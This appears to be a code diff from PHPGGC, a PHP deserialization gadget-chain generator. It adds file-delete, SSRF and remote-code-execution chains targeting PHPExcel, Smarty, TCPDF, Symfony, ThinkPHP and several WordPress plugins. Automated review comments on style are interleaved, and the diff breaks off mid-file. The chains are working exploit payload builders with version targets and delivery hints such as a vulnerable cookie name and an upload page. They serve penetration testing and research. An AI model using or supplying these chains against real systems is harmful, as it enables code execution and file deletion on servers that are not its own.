3 //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/Linter/ProcessLinter.php
4 class ProcessLinter
5 {
6
7 function __construct($remote_file)
8 {
9 $this->temporaryFile = $remote_file;
10 $this->fileRemoval = new \PhpCsFixer\FileRemoval();
11
12 }
13
14 /*
15 public function __destruct()
16 {
17 if (null !== $this->temporaryFile) {
18 $this->fileRemoval->delete($this->temporaryFile);
19 }
20 }
21 */
22
23 }
24 }
25
26 namespace PhpCsFixer
27 {
28
29 //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php
30 class FileRemoval
31
32 {
33
34 public function delete($path)
35 {
36 if (isset($this->files[$path]))
37 {
38 unset($this->files[$path]);
39 }
40 $this->unlink($path);
41 }
42 private function unlink($path)
43 {
44 @unlink($path);
45 }
46
47 }
48 }
49
50 /*
51 public function delete($path)
52 {
53 if (isset($this->files[$path])) {
54 unset($this->files[$path]);
55 }
56 $this->unlink($path);
57 }
58
59 */
60
61 ?>
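Review bot: `FileRemoval` on lines 30–47 carries live `delete()`/`unlink()` methods with an `@unlink($path)` body, although the generator only needs the class shape for serialization and the same methods are already shown as a comment on lines 50–59. A callable unlink wrapper inside the generator is an unnecessary footgun and duplicates the comment; FD1's gadgets.php keeps the upstream code comment-only, which is the cleaner pattern to follow here (the blank line between `class FileRemoval` and `{` on lines 30–32 can go too). The same applies to `Smarty_Internal_CacheResource_File::releaseLock` in Smarty/FD1 gadgets.php, whose `unlink($cached->lock_id)` appears never to be invoked by the generator.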
0 <?php
1
2 namespace GadgetChain\PHPExcel;
3
4 class FD1 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '1.8.2+';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9
10 public function generate(array $parameters)
11 {
12 return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']);
13 }
14 }
0 <?php
1
2 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
3 class PHPExcel_CachedObjectStorage_DiscISAM {
4 private $fileName = null;
5 private $fileHandle = 42;
6
7 public function __construct($filePath) {
8 $this->fileName = $filePath;
9 }
10
11 /*
12 public function __destruct() {
13 if (!is_null($this->fileHandle)) {
14 fclose($this->fileHandle); // Will only produce a warning
15 unlink($this->fileName);
16 }
17 $this->fileHandle = null;
18 }
19 */
20 }
0 <?php
1
2 namespace GadgetChain\PHPExcel;
3
4 class FD2 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 1.8.1';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9
10 public function generate(array $parameters)
11 {
12 return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']);
13 }
14 }
0 <?php
1
2 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
3 class PHPExcel_CachedObjectStorage_DiscISAM {
4 private $_fileName = null;
5 private $_fileHandle = 42;
6
7 public function __construct($filePath) {
8 $this->_fileName = $filePath;
9 }
10
11 /*
12 public function __destruct() {
13 if (!is_null($this->_fileHandle)) {
14 fclose($this->_fileHandle); // Will only produce a warning
15 unlink($this->_fileName);
16 }
17 $this->_fileHandle = null;
18 } // function __destruct()
19 */
20 }
0 <?php
1
2 namespace GadgetChain\PHPExcel;
3
4 class FD3 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '1.8.2+';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9
10 public function generate(array $parameters)
11 {
12 return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']);
13 }
14 }
0 <?php
1
2 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php
3 class PHPExcel_Shared_XMLWriter {
4 private $tempFileName = '';
5
6 public function __construct($filePath) {
7 $this->tempFileName = $filePath;
8 }
9
10 /*
11 public function __destruct()
12 {
13 // Unlink temporary files
14 if ($this->tempFileName != '') {
15 @unlink($this->tempFileName);
16 }
17 }
18 */
19 }
0 <?php
1
2 namespace GadgetChain\PHPExcel;
3
4 class FD4 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 1.8.1';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9
10 public function generate(array $parameters)
11 {
12 return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']);
13 }
14 }
0 <?php
1
2 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php
3 class PHPExcel_Shared_XMLWriter {
4 private $_tempFileName = '';
5
6 public function __construct($filePath) {
7 $this->_tempFileName = $filePath;
8 }
9
10 /*
11 public function __destruct()
12 {
13 // Unlink temporary files
14 if ($this->_tempFileName != '') {
15 @unlink($this->_tempFileName);
16 }
17 }
18 */
19 }
66 public static $version = '<= 1.2.2';
77 public static $vector = '__wakeup';
88 public static $author = 'Raz0r';
9 public static $informations = '
9 public static $information = '
1010 This chain does not expect parameters, will eval() any code supplied in
1111 php://input (i.e. POST data). Requires allow_url_include = true.
1212 ';
00 <?php
11
2 namespace Phalcon\Di{
2 namespace Phalcon\Di {
33 class Service {
44 protected $_shared;
55 protected $_definition;
6969 }
7070 }
7171
72 ?>
11
22 namespace GadgetChain\Pydio\Guzzle;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '< 8.2.2';
77 public static $vector = '__toString';
11
22 namespace GadgetChain\Slim;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '3.8.1';
77 public static $vector = '__toString';
0 <?php
1
2 namespace GadgetChain\Smarty;
3
4 class FD1 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '?';
7 public static $vector = '__destruct';
8 public static $author = 'd3adc0de';
9 public static $parameters = [
10 'remote_file'
11 ];
12
13 public function generate(array $parameters)
14 {
15 return new \Smarty_Internal_Template($parameters['remote_file']);
16 }
17 }
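Review bot: `$parameters = ['remote_file']` on lines 9–11 is declared explicitly, whereas the other FileDelete chains added in this commit (Laminas/FD1, PHPCSFixer/FD1, PHPExcel/FD1) leave it to the base class, and the same commit removes an apparently redundant `$parameters` from Laravel/RCE5. If `\PHPGGC\GadgetChain\FileDelete` already defines `remote_file`, these three lines can be dropped for consistency; if it does not, the other chains are the ones to fix.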
0 <?php
1
2 abstract class Smarty_CacheResource
3 {
4 }
5
6 class Smarty_Internal_CacheResource_File extends Smarty_CacheResource
7 {
8 public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached)
9 {
10 $cached->is_locked = false;
11 unlink($cached->lock_id);
12 }
13 }
14
15 class Smarty_Template_Cached
16 {
17 public $lock_id = null;
18 public $is_locked = true;
19
20 public function __construct()
21 {
22 $this->handler = new Smarty_Internal_CacheResource_File();
23 $this->lock_id = '';
24 }
25
26 public function setlock($lock_id){
27 if($lock_id){
28 $this->lock_id = $lock_id;
29 }
30 }
31 }
32
33 class Smarty_Internal_TemplateBase
34 {
35 }
36
37 class Smarty extends Smarty_Internal_TemplateBase
38 {
39 public $cache_locking = true;
40 public $cache_dir;
41 public $use_sub_dirs;
42 public function __construct(){
43 $this->cache_locking = 1;
44 $this->cache_dir = "/";
45 $this->use_sub_dirs = true;
46 $this->cache = true;
47 }
48 }
49
50 class Smarty_Internal_Template extends Smarty_Internal_TemplateBase
51 {
52
53 public $cached;
54 public $smarty;
55
56 public function __construct($lock_id){
57 $this->smarty = new Smarty();
58 $this->cached = new Smarty_Template_Cached();
59 $this->setlock($lock_id);
60 }
61
62 public function setlock($lock_id){
63 $this->cached->setlock($lock_id);
64 }
65
66 }
67
68 ?>
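Review bot: `Smarty_Template_Cached::__construct` (line 22) and `Smarty::__construct` (line 46) assign properties that the stub classes never declare (`handler`, `cache`); dynamic property creation is deprecated as of PHP 8.2, so the stubs should declare them, e.g. `public $handler;` and `public $cache;`. The same pattern appears in the Smarty SSRF gadgets file (`$this->handler` in its `Smarty_Template_Cached`) and in `yii\db\Connection` in the Yii2 RCE1 gadgets (`$this->dsn`). `releaseLock()` on lines 8-12 is left as live code containing the `unlink()` sink, whereas every other gadgets file in this commit keeps the original sink method inside a `/* ... */` block; commenting it out the same way documents the sink without leaving it callable. The file also ends with a `?>` closing tag (line 68), which this commit removes from the Phalcon gadgets; it should be dropped here and in the Smarty SSRF1 chain and gadgets files and the Yii2 RCE2 gadgets file as well.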
0 <?php
1 namespace GadgetChain\Smarty;
2
3 class SSRF1 extends \PHPGGC\GadgetChain\SSRF
4 {
5 public static $version = '?';
6 public static $vector = '__destruct';
7 public static $foundby = 'unknown';
8 public static $author = 'mr_me';
9 public static $information = '
10 Reference: https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Positive-Research-2014-eng.pdf (2014).
11 This was originally an XXE gadget chain, but it does not work on recent PHP versions.
12 Therefore, the gadget chain is now just an SSRF.
13 According to raz0r, it "works only in PHP <5.4.12/5.3.22".
14 ';
15
16 public function generate(array $parameters)
17 {
18 return new \Smarty_Internal_Template($parameters['uri']);
19 }
20 }
21 ?>
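Review bot: `public static $foundby = 'unknown';` on line 7 is a property no other chain in this commit declares, so it is presumably not read by the framework; if it is not, the credit belongs in `$author` or `$information` and the property should be removed, and if it is, the other chains are the inconsistent ones. `$version = '?'` on line 5 while the information block quotes a concrete PHP bound ("works only in PHP <5.4.12/5.3.22") is a small documentation gap; a short line such as `Smarty version unknown; PHP bound above is the limiting factor.` would make the `?` deliberate. The trailing `?>` on line 21 should go for the same reason it is removed from the Phalcon gadgets in this commit.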
0 <?php
1 class Smarty_Template_Cached
2 {
3 public $is_locked = true;
4 public function __construct($url)
5 {
6 $res = parse_url($url);
7 $this->handler = new SoapClient(null, [
8 'uri' => $res['scheme'] . '://' . $res['host'] . '/',
9 'location' => $url
10 ]);
11 }
12 }
13
14 class Smarty
15 {
16 public $cache_locking = true;
17 }
18
19 class Smarty_Internal_Template
20 {
21 public $cached;
22 public $smarty;
23
24 public function __construct($url)
25 {
26 $this->smarty = new Smarty();
27 $this->cached = new Smarty_Template_Cached($url);
28 }
29 }
30 ?>
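Review bot: `Smarty_Template_Cached::__construct` dereferences `$res['scheme']` and `$res['host']` on line 8 without checking the result of `parse_url()`, which returns `false` for seriously malformed input and omits those keys when the `uri` parameter has no scheme or host; the chain then emits notices and silently builds a `://` string. Validate before concatenating: `if ($res === false || !isset($res['scheme'], $res['host'])) { throw new \InvalidArgumentException('uri must include a scheme and a host'); }`. Note also that, unlike the other gadgets files, this one instantiates the real `SoapClient` rather than a stub, so generation requires ext-soap in the phpggc runtime; a `class_exists('SoapClient')` check with a clear message would turn a fatal "class not found" into an actionable error. `$this->handler` is a dynamic property here too and should be declared.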
66 public static $version = '2.5.2';
77 public static $vector = 'DebugImport';
88 public static $author = 'cf';
9 public static $informations = '
9 public static $information = '
1010 This chain is supposed to be uploaded through the /_profiler/import
1111 page. It will produce an error but the file will be created in the
1212 webroot.
11
22 namespace GadgetChain\Symfony;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
55 {
66 public static $version = '3.3';
77 public static $vector = '__destruct';
88 public static $author = 'cf';
9 public static $informations = 'Executes given command through proc_open()';
10 public static $parameters = [
11 'command'
12 ];
9 public static $information = 'Executes given command through proc_open()';
1310
1411 public function generate(array $parameters)
1512 {
11
22 namespace GadgetChain\Symfony;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\PHPCode
55 {
66 public static $version = '2.3.42 < 2.6';
77 public static $vector = '__destruct';
88 public static $author = 'crlf';
9 public static $informations = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )';
10 public static $parameters = [
11 'code'
12 ];
9 public static $information = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )';
1310
1411 public function generate(array $parameters)
1512 {
11
22 namespace GadgetChain\Symfony;
33
4 class RCE3 extends \PHPGGC\GadgetChain\RCE
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\PHPCode
55 {
66 public static $version = '2.6 <= 2.8.32';
77 public static $vector = '__destruct';
88 public static $author = 'crlf';
9 public static $informations = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )';
10 public static $parameters = [
11 'code'
12 ];
9 public static $information = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )';
1310
1411 public function generate(array $parameters)
1512 {
11
22 namespace GadgetChain\Symfony;
33
4 class RCE4 extends \PHPGGC\GadgetChain\RCE
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '3.4.0-34, 4.2.0-11, 4.3.0-7';
77 public static $vector = '__destruct';
88 public static $author = 'wisdomtree';
9 public static $informations = 'Execute $function with $parameter (CVE-2019-18889)';
9 public static $information = 'Execute $function with $parameter (CVE-2019-18889)';
1010 public static $parameters = [
1111 'function',
1212 'parameter'
0 <?php
1
2 namespace GadgetChain\TCPDF;
3
4 class FD1 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 6.3.5';
7 public static $vector = '__destruct';
8 public static $author = 'timoles';
9 public static $information = '
10 TCPDF contains the variable "imagekeys" which expects an array of strings. Upon __destruct an "unlink()" is
11 called on all filepaths within the imagekeys array.
12 ';
13
14 public function generate(array $parameters)
15 {
16 $file = $parameters['remote_file'];
17
18 return new \TCPDF(
19 $file
20 );
21 }
22 }
0 <?php
1
2 class TCPDF {
3 protected $imagekeys;
4
5 function __construct($remote_file) {
6 $this->imagekeys = [
7 $remote_file
8 ];
9 }
10 }
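Review bot: `function __construct($remote_file)` on line 5 has no visibility keyword, while every other stub constructor added in this commit is declared `public function __construct(...)`; make it `public function __construct($remote_file) {`. The file is also the only new gadgets file without a reference comment pointing at the upstream source of the stubbed class; the sibling files carry a `# https://...` line above each class, and a matching `// TCPDF - <upstream file URL>` comment above `class TCPDF` would let a reader verify the `imagekeys` property name against the real class.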
11
22 namespace GadgetChain\ThinkPHP;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.1.x-5.2.x';
77 public static $vector = '__destruct';
88 public static $author = 'Smi1e';
9 public static $informations = '
9 public static $information = '
1010 This chain can only execute system().
1111 Because the second parameter is uncontrollable
1212 ';
13
1314 public function generate(array $parameters)
1415 {
1516 $function = $parameters['function'];
0 <?php
1
2 namespace GadgetChain\WordPress\Dompdf;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '0.8.5+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = '
10 Tested up to WP 5.4.1 and Dompdf 0.8.5. Newest versions might also work.
11 Example of plugins using this library:
12 woocommerce-pdf-invoices-packing-slips (lib only included when a PDF is output)
13 advanced-cf7-db (lib only included when PDF generated)
14 ';
15
16 public function generate(array $parameters)
17 {
18 $function = $parameters['function'];
19 $parameter = $parameters['parameter'];
20
21 return new \Dompdf\Adapter\CPDF(
22 new \Requests_Utility_FilteredIterator([$parameter], $function)
23 );
24 }
25 }
0 <?php
1
2 namespace
3 {
4 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
5 }
6
7 namespace Dompdf\Adapter
8 {
9 // https://github.com/dompdf/dompdf/blob/master/src/Adapter/CPDF.php
10 class CPDF
11 {
12 // Since 0.8.5, this attribute is protected (was private before)
13 protected $_image_cache;
14
15 // Custom contrustor to set the payload
16 public function __construct($image_cache)
17 {
18 $this->_image_cache = $image_cache;
19 }
20
21 /*
22 public function __destruct()
23 {
24 foreach ($this->_image_cache as $img) {
25 // The file might be already deleted by 3rd party tmp cleaner,
26 // the file might not have been created at all
27 // (if image outputting commands failed)
28 // or because the destructor was called twice accidentally.
29 if (!file_exists($img)) {
30 continue;
31 }
32
33 if ($this->_dompdf->getOptions()->getDebugPng()) {
34 print '[__destruct unlink ' . $img . ']';
35 }
36 if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) {
37 unlink($img);
38 }
39 }
40 }
41 */
42 }
43 }
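Review bot: The comment on line 15 reads `// Custom contrustor to set the payload`; it should be `// Custom constructor to set the payload`. The same typo appears on line 14 of the Dompdf RCE2 gadgets file added in this commit, so fix both together.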
0 <?php
1
2 namespace GadgetChain\WordPress\Dompdf;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '0.7.0 <= 0.8.4 & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = '
10 Tested up to WP 5.4.1 and Dompdf 0.8.4.
11 Example of plugins using this library:
12 woocommerce-pdf-invoices-packing-slips (lib only included when a PDF is output)
13 advanced-cf7-db (lib only included when PDF generated)
14 ';
15
16 public function generate(array $parameters)
17 {
18 $function = $parameters['function'];
19 $parameter = $parameters['parameter'];
20
21 return new \Dompdf\Adapter\CPDF(
22 new \Requests_Utility_FilteredIterator([$parameter], $function)
23 );
24 }
25 }
0 <?php
1
2 namespace
3 {
4 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
5 }
6
7 namespace Dompdf\Adapter
8 {
9 // https://github.com/dompdf/dompdf/blob/v0.8.4/src/Adapter/CPDF.php
10 class CPDF
11 {
12 private $_image_cache;
13
14 // Custom contrustor to set the payload
15 public function __construct($image_cache)
16 {
17 $this->_image_cache = $image_cache;
18 }
19
20 /*
21 public function __destruct()
22 {
23 foreach ($this->_image_cache as $img) {
24 // The file might be already deleted by 3rd party tmp cleaner,
25 // the file might not have been created at all
26 // (if image outputting commands failed)
27 // or because the destructor was called twice accidentally.
28 if (!file_exists($img)) {
29 continue;
30 }
31
32 if ($this->_dompdf->getOptions()->getDebugPng()) {
33 print '[__destruct unlink ' . $img . ']';
34 }
35 if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) {
36 unlink($img);
37 }
38 }
39 }
40 */
41 }
42 }
11
22 namespace GadgetChain\WordPress\Guzzle;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '4.0.0 <= 6.4.1+';
6 public static $version = '4.0.0 <= 6.4.1+ & WP < 5.5.2';
77 public static $vector = '__toString';
88 public static $author = 'erwan_lr';
9 public static $informations = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.';
9 public static $information = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.';
1010
1111 public function generate(array $parameters)
1212 {
11
22 namespace GadgetChain\WordPress\Guzzle;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '4.0.0 <= 6.4.1+';
6 public static $version = '4.0.0 <= 6.4.1+ & WP < 5.5.2';
77 public static $vector = '__destruct';
88 public static $author = 'Kevinlpd';
9 public static $informations = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.';
9 public static $information = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.';
1010
1111 public function generate(array $parameters)
1212 {
0 <?php
1
2 namespace GadgetChain\WordPress\P\EmailSubscribers;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '4.0 <= 4.4.7+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.4.1 and EmailSubscribers 4.4.7. Newest versions might also work.';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \IG_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function));
17 }
18 }
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 // EmailSubsribers - https://plugins.svn.wordpress.org/email-subscribers/trunk/lite/includes/logs/log-handlers/class-ig-log-handler-file.php
5 class IG_Log_Handler_File {
6 protected $handles = array();
7
8 // Custom constructor to set the $handles more easily
9 public function __construct($handles) {
10 $this->handles = $handles;
11 }
12
13 /*
14 public function __destruct() {
15 foreach ( $this->handles as $handle ) {
16 if ( is_resource( $handle ) ) {
17 fclose( $handle ); // @codingStandardsIgnoreLine.
18 }
19 }
20 }
21 */
22 }
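Review bot: The reference comment on line 4 misspells the plugin as "EmailSubsribers"; it should read `// EmailSubscribers - https://plugins.svn.wordpress.org/email-subscribers/trunk/lite/includes/logs/log-handlers/class-ig-log-handler-file.php`, matching the namespace `GadgetChain\WordPress\P\EmailSubscribers` in the chain file. `protected $handles = array();` on line 6 uses the long array syntax while the rest of this commit uses `[]`; write `protected $handles = [];` here and in the EverestForms gadgets file, whose line 6 has the same declaration.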
0 <?php
1
2 namespace GadgetChain\WordPress\P\EverestForms;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.0 <= 1.6.7+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.4.1 and EverestForms 1.6.7. Newest versions might also work.
10 ';
11
12 public function generate(array $parameters)
13 {
14 $function = $parameters['function'];
15 $parameter = $parameters['parameter'];
16
17 return new \EVF_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function));
18 }
19 }
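Review bot: The `$information` string on lines 9-10 is a one-sentence value whose closing quote sits on its own line, so the displayed text carries a trailing newline; the EmailSubscribers chain in this commit writes the same sentence as a single-line string. Either close the quote on line 9 (`public static $information = 'Tested up to WP 5.4.1 and EverestForms 1.6.7. Newest versions might also work.';`) or, if multi-line is intended, follow the convention used elsewhere of opening with a newline as well.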
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 // EverestForms - https://plugins.svn.wordpress.org/everest-forms/trunk/includes/log-handlers/class-evf-log-handler-file.php
5 class EVF_Log_Handler_File {
6 protected $handles = array();
7
8 // Custom constructor to set the $handles more easily
9 public function __construct($handles) {
10 $this->handles = $handles;
11 }
12
13 /*
14 public function __destruct() {
15 foreach ( $this->handles as $handle ) {
16 if ( is_resource( $handle ) ) {
17 fclose( $handle ); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_read_fclose
18 }
19 }
20 }
21 */
22 }
11
22 namespace GadgetChain\WordPress\P\WooCommerce;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '3.4.0 <= 3.6.2+';
6 public static $version = '3.4.0 <= 4.1.0+ & WP < 5.5.2';
77 public static $vector = '__destruct';
88 public static $author = 'erwan_lr';
9 public static $informations = '
9 public static $information = '
1010 Demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763
11 Tested up to WP 5.2 and WooCommerce 3.6.2 activated (but not configured). Newest versions might also work.
11 Tested up to WP 5.4.1 and WooCommerce 4.1.0 activated (but not configured). Newest versions might also work.
1212 ';
1313
1414 public function generate(array $parameters)
0 <?php
1
2 namespace GadgetChain\WordPress\P\WooCommerce;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '<= 3.4.0 & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'Vincent Ulitzsch(@vinulium) and Pascal Zenker (@parzel2), based on WooCommerce RCE by erwan_lr';
9 public static $information = '
10 Simple adaption of the gadgetchain demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763.
11 Original chain by erwan_lr.
12 Tested up to WP 5.1.1 and WooCommerce 3.4.0 activated (but not configured).
13 ';
14
15 public function generate(array $parameters)
16 {
17 $function = $parameters['function'];
18 $parameter = $parameters['parameter'];
19
20 return new \WC_Logger(new \Requests_Utility_FilteredIterator([$parameter], $function));
21 }
22 }
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 // WooCommerce - https://plugins.trac.wordpress.org/browser/woocommerce/trunk/includes/log-handlers/class-wc-log-handler-file.php
5 class WC_Logger
6 {
7 private $_handles;
8
9 // Custom constructor to set the $handles more easily
10 public function __construct($handles)
11 {
12 $this->_handles = $handles;
13 }
14 }
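Review bot: The reference comment on line 4 points at `class-wc-log-handler-file.php`, but the class stubbed below is `WC_Logger`, not `WC_Log_Handler_File`; either the URL should point at the file that defines `WC_Logger` or the comment should explain why the handler file is the relevant reference. Unlike the other gadgets files in this commit, this stub also carries no commented-out copy of the original method that consumes `$_handles`, so a reader cannot see which `__destruct` path the `$vector = '__destruct'` in the chain file refers to; adding that method inside a `/* ... */` block, as the IG_Log_Handler_File and EVF_Log_Handler_File stubs do, would document the sink without making it callable.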
11
22 namespace GadgetChain\WordPress\P\YetAnotherStarsRating;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '? <= 1.8.6';
6 public static $version = '? <= 1.8.6 & WP < 5.5.2';
77 public static $vector = '__destruct';
88 public static $author = 'erwan_lr';
9 public static $informations = 'Paylaod has to be in the COOKIE yasr_visitor_vote_cookie in a page containing the shortcode of the plugin allowing visitor ratings';
9 public static $information = 'Payload has to be in the COOKIE yasr_visitor_vote_cookie in a page containing the shortcode of the plugin allowing visitor ratings';
1010
1111 public function generate(array $parameters)
1212 {
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.8.2+ & WP < 5.5.2';
7 public static $vector = '__toString';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_RichText(
17 new \Requests_Utility_FilteredIterator([$parameter], $function)
18 );
19 }
20 }
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '<= 1.8.1 & WP < 5.5.2';
7 public static $vector = '__toString';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_RichText(
17 new \Requests_Utility_FilteredIterator([$parameter], $function)
18 );
19 }
20 }
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $_richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->_richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->_richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.8.2+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_CachedObjectStorage_DiscISAM(
17 new \PHPExcel_RichText(
18 new \Requests_Utility_FilteredIterator([$parameter], $function)
19 )
20 );
21 }
22 }
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
31
32 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
33 class PHPExcel_CachedObjectStorage_DiscISAM {
34 private $fileName = null;
35 private $fileHandle = 42;
36
37 public function __construct($filePath) {
38 $this->fileName = $filePath;
39 }
40
41 /*
